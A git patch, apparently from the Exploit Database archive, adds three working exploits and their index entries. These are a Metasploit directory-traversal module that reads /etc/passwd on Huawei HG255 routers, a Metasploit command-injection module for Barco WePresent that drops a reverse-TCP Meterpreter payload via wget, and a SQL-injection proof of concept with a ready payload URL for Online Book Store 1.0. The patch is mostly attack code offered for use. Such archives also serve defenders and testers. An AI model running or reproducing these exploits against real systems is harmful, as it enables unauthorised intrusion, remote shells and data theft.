From dbb38f4b3a73c63df6d832fc516be510891eafe6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 16 Jan 2020 05:02:06 +0000 Subject: [PATCH] DB: 2020-01-16 3 changes to exploits/shellcodes Barco WePresent - file_transfer.cgi Command Injection (Metasploit) Online Book Store 1.0 - 'bookisbn' SQL Injection Huawei HG255 - Directory Traversal ( Metasploit ) --- exploits/hardware/webapps/47923.rb | 57 ++++++++++++++++ exploits/linux/remote/47924.rb | 105 +++++++++++++++++++++++++++++ exploits/php/webapps/47922.txt | 58 ++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 223 insertions(+) create mode 100755 exploits/hardware/webapps/47923.rb create mode 100755 exploits/linux/remote/47924.rb create mode 100644 exploits/php/webapps/47922.txt diff --git a/exploits/hardware/webapps/47923.rb b/exploits/hardware/webapps/47923.rb new file mode 100755 index 000000000..857fa8396 --- /dev/null +++ b/exploits/hardware/webapps/47923.rb @@ -0,0 +1,57 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# +## + + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Huawei HG255 Directory Traversal', + ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’, + ‘Author’ => ‘Ismail Tasdelen’, + ‘License’ => MSF_LICENSE, + ‘References’ => + [ + ['CVE', '2017-17309' ], + ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en'] + ] + ) + register_options( + [ + Opt::RPORT(80) + ], self.class + ) + end + + def run + urllist=[ + ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, + ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, + ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, + ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’] + + urllist.each do |url| + begin + res = send_request_raw( + { + ‘method’=> ‘GET’, + ‘uri’=> url + }) + + if res + print_good(“Vulnerable! for #{url}”) + else + print_status(“Vulnerable(no response) detected for #{url}”) + end + rescue Errno::ECONNRESET + print_status(“Vulnerable(rst) detected for #{url}”) + rescue Exception + print_error(“Connection failed.”) + end + end + end \ No newline at end of file diff --git a/exploits/linux/remote/47924.rb b/exploits/linux/remote/47924.rb new file mode 100755 index 000000000..59aba88a5 --- /dev/null +++ b/exploits/linux/remote/47924.rb @@ -0,0 +1,105 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Barco WePresent file_transfer.cgi Command Injection", + 'Description' => %q( + This module exploits an unauthenticated remote command injection + vulnerability found in Barco WePresent and related OEM'ed products. + The vulnerability is triggered via an HTTP POST request to the + file_transfer.cgi endpoint. + ), + 'License' => MSF_LICENSE, + 'Author' => 'Jacob Baines', # @Junior_Baines' + 'References' => + [ + ['CVE', '2019-3929'], + ['EDB', '46786'], + ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c'] + ], + 'DisclosureDate' => "Apr 30, 2019", + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => false, + 'Targets' => [ + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' } + }], + ['Linux Dropper', + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'CmdStagerFlavor' => ['printf', 'wget'], + 'Type' => :linux_dropper] + ], + 'DefaultTarget' => 1, + 'DefaultOptions' => { + 'SSL' => true, + 'RPORT' => 443, + 'CMDSTAGER::FLAVOR' => 'printf', + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' + })) + end + + def filter_bad_chars(cmd) + cmd.gsub!(/;/, 'Pa_Note') + cmd.gsub!(/\+/, 'Pa_Add') + cmd.gsub!(/&/, 'Pa_Amp') + return cmd + end + + def send_command(cmd, timeout) + vars_post = { + file_transfer: 'new', + dir: "'#{filter_bad_chars(cmd)}'" + } + + send_request_cgi({ + 'uri' => '/cgi-bin/file_transfer.cgi', + 'method' => 'POST', + 'vars_post' => vars_post + }, timeout) + end + + def check + check_resp = send_command(";whoami;", 5) + unless check_resp + return CheckCode::Unknown('Connection failed.') + end + + if check_resp.code == 200 + check_resp.body.gsub!(/[\r\n]/, "") + if check_resp.body == "root" + return CheckCode::Vulnerable + end + end + + CheckCode::Safe + end + + def execute_command(cmd, _opts = {}) + send_command(";(#{cmd})&", nil) + end + + def exploit + case target['Type'] + when :unix_memory + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager(linemax: 128) + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47922.txt b/exploits/php/webapps/47922.txt new file mode 100644 index 000000000..3faaddf07 --- /dev/null +++ b/exploits/php/webapps/47922.txt @@ -0,0 +1,58 @@ +# Exploit Title: Online Book Store 1.0 - 'bookisbn' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.) +# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ +# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip +# Version: 1.0 +# Tested on: Ubuntu 16.04 +# CVE: N/A + +-------------- Vulnerable code in book.php ( Line 1-25) ----------------------------------------------- + $book_isbn = $_GET['bookisbn']; // vulnerable param + // connecto database + require_once "./functions/database_functions.php"; + $conn = db_connect(); + + $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point + $result = mysqli_query($conn, $query); + if(!$result){ + echo "Can't retrieve data " . mysqli_error($conn); + exit; + } + + $row = mysqli_fetch_assoc($result); + if(!$row){ + echo "Empty book"; + exit; + } + + $title = $row['book_title']; + require "./template/header.php"; +?> + +

Books >

// results goes here +------------------------------------------------------------------------------------------------------------------- + +Exploit POC : + +# Parameter: bookisbn (GET) +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) + +#Payload: +http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp + +----------------------- +Other Vulnerable Pages with Same vulnerability : + +[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16] + +[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31] + +[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php] + +and other pages .... :) + +Also you can have more fun with Other XSS bugs too :) +---- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b68b21f9d..1c47b4565 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17929,6 +17929,7 @@ id,file,description,date,author,type,platform,port 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware, 47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux, 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java, +47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42222,3 +42223,5 @@ id,file,description,date,author,type,platform,port 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php, 47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware, 47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware, +47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php, +47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,